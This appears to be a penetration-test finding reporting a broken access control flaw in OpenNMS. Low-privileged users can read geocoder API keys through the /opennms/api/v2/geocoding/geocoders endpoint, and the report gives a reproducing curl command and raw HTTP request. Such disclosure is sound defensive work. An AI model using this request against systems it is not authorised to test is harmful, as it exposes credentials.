Overview

Access Controls help an application determine which users should have access to which resources based on user roles, responsibilities, or other relevant criteria. For example, an application dealing with Personally Identifiable Information (PII) should allow only authorized users to view or edit stored PII, and deny access to users who do not need to access it.

Access Controls are “Broken” when a user can access resources they are not authorized to access. An attacker can bypass any access control mechanisms in a web application, and gain unauthorized access to resources that are not available with their permissions.

Broken access control can allow attackers to:

• Access resources only accessible to certain users, thus allowing unauthorized access to data

• Perform operations on behalf of other users, leading to account takeovers in the worst cases

• Attempt privilege escalation

• Attempt to take over an account

1.  

   1.  

      1. References

• [OWASP C7: Enforce Access Controls](https://owasp.org/www-project-proactive-controls/v3/en/c7-enforce-access-controls)

• [OWASP's Authorization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html)

• [CWE-284](https://cwe.mitre.org/data/definitions/284.html)

During the tests, it was determined that users with low privileges could view *Geocoder Configuration* information without authorization.

Browser URL

https://pentest24.eastus.cloudapp.azure.com/opennms/api/v2/geocoding/geocoders

Steps To Reproduce

1-) Login to the application and navigate to https://pentest24.eastus.cloudapp.azure.com/opennms/admin/geoservice/index.jsp#/!/geocoding/config URL.

• As seen in the screenshot below, a user with low privileges cannot view the *Geocoder Configuration* page.


2-) Send a request to the `/opennms/api/v2/geocoding/geocoders` API endpoint using the *cURL* command given below:

• Replace the session cookie information with a valid value before using the command.
  ```
  curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: pentest24.eastus.cloudapp.azure.com' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: application/json, text/plain, /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ -b $'JSESSIONID=node0hhp7txpignd6ss7h5xsxcppx150300.node0' \ $'https://pentest24.eastus.cloudapp.azure.com/opennms/api/v2/geocoding/geocoders'
  ```

• As seen in the screenshot below, a user with low privileges can access API keys and similar sensitive data by sending a request to the `/opennms/api/v2/geocoding/geocoders` API endpoint:


Severity

medium

A limited privileged user can get details of *Geocoder Configuration*. It includes *API* keys and other sensitive information.

Suggested Fix

It is suggested to implement proper access control checks for the affected endpoint which should not be accessible for low privileged users.

Prerequisites

A user account with low privileges is required.

HTTP Request

GET /opennms/api/v2/geocoding/geocoders HTTP/1.1

Host: pentest24.eastus.cloudapp.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Cookie: JSESSIONID=node0hhp7txpignd6ss7h5xsxcppx150300.node0

Cobalt URL

#PT22584_6